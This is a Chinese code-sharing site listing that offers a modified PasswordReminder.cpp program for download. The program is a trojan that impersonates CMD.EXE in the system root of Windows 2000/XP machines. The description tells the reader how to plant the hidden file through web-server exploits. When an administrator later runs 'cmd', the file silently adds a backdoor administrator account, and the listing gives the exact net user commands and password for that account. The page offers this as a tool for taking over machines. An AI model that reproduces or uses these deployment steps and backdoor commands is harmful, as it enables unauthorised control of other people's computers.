登录
首页 » Network Security » 你是不是经常在开始菜单的运行窗口里运行命令呢? 看看这个漏洞: http://zdnet.com /2100...

你是不是经常在开始菜单的运行窗口里运行命令呢? 看看这个漏洞: http://zdnet.com /2100...

于 2022-06-01 发布 文件大小:18.50 kB
0 88
下载积分: 2 下载次数: 1

代码说明:

你是不是经常在开始菜单的运行窗口里运行命令呢? 看看这个漏洞: http://zdnet.com /2100-1105-964057.html win2000和xp在执行搜索的时候, 首先查找根目录 而开始菜单的运行窗口里执行命令, 也是首先在系统盘的根目录里进行查找. 这个漏洞其实是已经是公开的秘密了. 既然现在作为漏洞公布出来, 我也就把网上的PasswordReminder.cpp拿来改了改 加了一个加超级管理员用户和执行cmd.exe的功能. 使用方法: 把程序解压, 把压缩包里的文件 CMD.EXE (该文件具有隐藏和只读属性) 释放到目标机器的系统盘根目录, 一般都是在C:比如利用UNICODE/Decode漏洞就有写根目录的权限, 同时Asp/fp30reg.dll等远程溢出出来的Shell, 一般都只有匿名权限, 但是它具有写根目录的权限 这个时候, 就可以把本程序放到目标机器的系统盘根目录 只要等管理员在机器的开始菜单里运行命令: cmd 一切尽在掌握中.:) PS: 系统执行后, 会先产生一个线程来做一些处理 然后用system()函数调用cmd.exe来让用户能够执行命令. 产生出来的线程会产生两个进程序执行如下两个命令: net user ISUR_IWAM wwwcnhonkercom /add net localgroup administrators ISUR_IWAM /add 这样就在系统上增加了一个超级-cmd loopholes in the source code

下载说明:请别用迅雷下载,失败请重下,重下不扣分!

发表评论

0 个回复

  • findpass的源代码
    findpass的源代码- code about findpass
    2023-05-20 20:45:03下载
    积分:1
  • 仿照书本创建进程的方法,在父进程中创建两个进程,然后根据实验要求更改,观察,理解进程的运行过程。...
    仿照书本创建进程的方法,在父进程中创建两个进程,然后根据实验要求更改,观察,理解进程的运行过程。-Create a process modeled on the books method, the parent process to create two processes, and then request to change the basis of experiment, observation and understanding of the process is running.
    2023-01-24 22:00:04下载
    积分:1
  • unformat,一个格式化后的数据恢复工具,c++语言编写的。
    unformat,一个格式化后的数据恢复工具,c++语言编写的。-unformat, a formatted data recovery tool, c prepared by the language.
    2022-01-27 21:04:36下载
    积分:1
  • 检测远程机器是否有冲击波的漏洞
    检测远程机器是否有冲击波的漏洞-detect whether remote machines shock the loopholes
    2022-07-27 03:30:03下载
    积分:1
  • V3 updated rewrite of the entire system psychological counseling, to learn the h...
    V3更新重写了整个心理咨询系统,吸取了历史版本的诸多有点,然后在增加了一些本人认为一个心理网站所需要的扩展功能,做到了非常人性化的局面,也许系统里面还存在部分JAVASCRIPT的错误,这是因为我没有增加容错脚本,其实没什么大关系的!好了现在谈谈重点的有哪些功能增加了吧: 1、个人拥有一个控制面板(基本资料,密码,头像,备忘录),虽然功能比较简单,但作为一个心理平台的话已经够了 2、心理讨论,系统的主体,比历史版本的平台功能强化了一下,具体功能如何内见,保证会让你满意 3、放松一刻:辅助模块,用于轻松心理咨询者抱着比较紧张的心情来浏览得到舒心的功能,有音乐试听互动的功能 4、系统功能,本系统是结合了历史版本的有点的,所以历史版本还存在免验证和验证的分别2套系统,而本系统则只要点点其中的参数设置即可设定成功,而且用户验证数据还可以通过EXCEL表格自由导入,方便异常 5、管理员登录名:admin 密 码 :admin 应网友要求,特别改制了ACCESS数据库版,可能数据库移植还有点问题,希望大家到官方网站去讨论交流-V3 updated rewrite of the entire system psychological counseling, to learn the history of the many versions somewhat, Then some of the extra that I have a psychological need for the expansion, and ensure that the very humanity of the situation, Perhaps system still exist inside the part JAVASCRIPT wrong, it is because I have no script to increase fault tolerance, In fact, nothing related to the! Well now turn to focus on what are the functions of the increase it : an individual with a control panel (basic information
    2022-01-26 03:42:06下载
    积分:1
  • RSA算法是密码学中一个重要算法,该程序给出了该算法的完整实现过程。...
    RSA算法是密码学中一个重要算法,该程序给出了该算法的完整实现过程。 -RSA cryptography algorithm is an important algorithm, the procedure of the algorithm is a complete implementation process.
    2022-04-20 05:02:50下载
    积分:1
  • 源代码
    源代码-Source code
    2023-02-26 12:20:03下载
    积分:1
  • 44个实用VB小技巧的打包
    44个实用VB小技巧的打包-44 practical tips for packing VB
    2022-01-25 18:31:05下载
    积分:1
  • 网络安全开发包,可用于开发多种网络安全方面的程序.
    网络安全开发包,可用于开发多种网络安全方面的程序.
    2023-08-01 15:15:03下载
    积分:1
  • snmp vc++6编程
    snmp vc++6编程-snmp vc++6 programming
    2023-06-19 04:20:03下载
    积分:1
  • 696518资源总数
  • 105554会员总数
  • 2今日下载